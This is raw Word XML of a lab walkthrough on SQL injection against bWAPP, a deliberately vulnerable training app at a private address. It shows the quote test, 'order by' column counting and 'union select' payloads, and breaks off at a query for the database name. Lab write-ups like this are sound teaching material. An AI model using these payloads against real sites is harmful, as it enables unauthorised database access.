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C77ED" w14:textId="6B3C7150" w:rsidR="004B1A58" w:rsidRPr="009552B5" w:rsidRDefault="00E1461F" w:rsidP="00E1461F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 w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Bwapp SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D40CBE" w14:textId="15686F89" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00E1461F" w:rsidP="00231A09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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4FA2515D" wp14:editId="555295A8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>377190</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="4678680"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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8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1A09" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">In URL we used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:r w:rsidR="00231A09" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00231A09" w:rsidRPr="009552B5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="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00231A09" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">to check if Server is vulnerable to SQL Injection or not </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B476A9" w14:textId="655408A7" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00231A09" w:rsidP="00E1461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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">As error is </w:t>
      </w:r>
      <w:r w:rsidR="009552B5" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>popup,</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can see it is injectable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D334DC3" w14:textId="4A5CC6E9" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00E1461F" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6447B2B5" w14:textId="2D9FB055" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623C79E7" w14:textId="451D88A1" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190F700B" w14:textId="004A0A86" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338276D2" w14:textId="2F151C5A" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57ED6430" w14:textId="492967D1" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5480A9B9" w14:textId="66FBEE27" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EC471A" w14:textId="287090BB" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="016D1913" w14:textId="516797C9" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E36E878" w14:textId="6B80F87E" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC9DCC1" w14:textId="32AA68B7" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00231A09" w:rsidP="00145C51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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>We used order by caused to check how many columns table ha</w:t>
      </w:r>
      <w:r w:rsidR="00817837" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ve.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E800075" w14:textId="13727E00" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00145C51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="009552B5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.56.102/bWAPP/sqli_1.php?title=man</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>order by 8</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- -&amp;action=search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3AF2AC" w14:textId="10F20C7F" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30D60B7A" wp14:editId="1E8308A9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>281305</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3671570"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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1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9B9B46" w14:textId="4EA0B062" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00E1461F" w:rsidP="00E1461F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059B8548" w14:textId="3A54E14A" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00E1461F" w:rsidP="00E1461F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6553AE52" w14:textId="07B93C1F" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Error say column number 8 is not available </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803D740" w14:textId="08D1D311" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00E1461F" w:rsidP="00E1461F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749ADFFB" w14:textId="748F91D9" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461F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42DB20CD" w14:textId="6B8632C2" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461F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165637F6" w14:textId="04AD9909" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461F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2A50DA82" w14:textId="77777777" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461F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25314CB0" w14:textId="50F4E52B" w:rsidR="00E1461F" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">we tried column number 7 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADBD292" w14:textId="77777777" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00817837">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="009552B5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://192.168.56.102/bWAPP/sqli_1.php?title=man</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>order by 7</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -- -&amp;action=search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3B0A0D" w14:textId="7F845DC1" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461F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4C5BFE60" w14:textId="5E088B38" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7F1C7E08" wp14:editId="20DFDC06">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>106680</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>312420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3403600"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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F73E28" w14:textId="2E74E3C5" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461F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54175DEC" w14:textId="50E3C9AE" w:rsidR="00817837" w:rsidRPr="009552B5" w:rsidRDefault="00817837" w:rsidP="00E1461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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">with this error we got to know column number 7 is </w:t>
      </w:r>
      <w:r w:rsidR="00AA338F" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>present,</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> hence table contain </w:t>
      </w:r>
      <w:r w:rsidR="000B3BC6" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">7 columns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB58D0C" w14:textId="23BCE387" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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207179C0" w14:textId="3C588E12" w:rsidR="00AA338F" w:rsidRPr="009552B5" w:rsidRDefault="00AA338F" w:rsidP="00145C51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2C4F21C8" w14:textId="72CFB5F1" w:rsidR="00AA338F" w:rsidRPr="009552B5" w:rsidRDefault="00AA338F" w:rsidP="00145C51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2583D8E9" w14:textId="4E252DF2" w:rsidR="00AA338F" w:rsidRPr="009552B5" w:rsidRDefault="00AA338F" w:rsidP="00145C51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03608BD0" w14:textId="29E05772" w:rsidR="00AA338F" w:rsidRPr="009552B5" w:rsidRDefault="00AA338F" w:rsidP="00145C51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1E8782B0" w14:textId="4FAD5E59" w:rsidR="00AA338F" w:rsidRPr="009552B5" w:rsidRDefault="00AA338F" w:rsidP="00145C51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53C87316" w14:textId="77777777" w:rsidR="00AA338F" w:rsidRPr="009552B5" w:rsidRDefault="00AA338F" w:rsidP="00145C51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4C6719E7" w14:textId="0137929B" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="009552B5" w:rsidP="00145C51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00AA338F" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">ow we have to check which all columns are injectable in this table </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAAE04" w14:textId="182FF024" w:rsidR="00AA338F" w:rsidRPr="009552B5" w:rsidRDefault="004116B9" w:rsidP="00145C51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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.56.102/bWAPP/sqli_1.php?title=</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>union select 1,2,3,4,5,6,7</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-- -&amp;action=search</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5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="00AA338F" w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1419439C" wp14:editId="74921858">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>498475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="382968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9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6E40AA" w14:textId="294F6C99" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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2E994A94" w14:textId="27FB20B1" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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21E4B0FC" w14:textId="086CA6CE" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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3C79E3A1" w14:textId="2B1E633E" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D20D80" w14:textId="75908F37" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="004116B9" w:rsidP="00145C51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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">with this output we got to know 2 ,3 ,4 ,5 columns are injectable. we will </w:t>
      </w:r>
      <w:r w:rsidR="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">this column of operations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BBF09" w14:textId="2E1820D4" w:rsidR="002E5527" w:rsidRPr="009552B5" w:rsidRDefault="002E5527" w:rsidP="00145C51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62802C1E" w14:textId="67060272" w:rsidR="00145C51" w:rsidRPr="009552B5" w:rsidRDefault="00145C51" w:rsidP="00145C51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6C98B996" w14:textId="14F29E13" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="00145C51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3AA70A35" w14:textId="353F5BC9" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="00145C51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73A97F23" w14:textId="487F4538" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="000B3BC6" w:rsidP="00145C51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558F5793" w14:textId="55D5A228" w:rsidR="000B3BC6" w:rsidRPr="009552B5" w:rsidRDefault="004116B9" w:rsidP="00145C51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>We will check database name, version of database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174795E" w14:textId="6AEA297F" w:rsidR="004116B9" w:rsidRPr="009552B5" w:rsidRDefault="004116B9" w:rsidP="00145C51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9552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://192.168.56.102/bWAPP/sqli_1.php?title=</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">union select </w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1, database</w:t>
      </w:r>
      <w:r w:rsidRPr="009552B5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Start"/>
      <w:r w:rsidRPr="009552B5">
        <w:rPr>
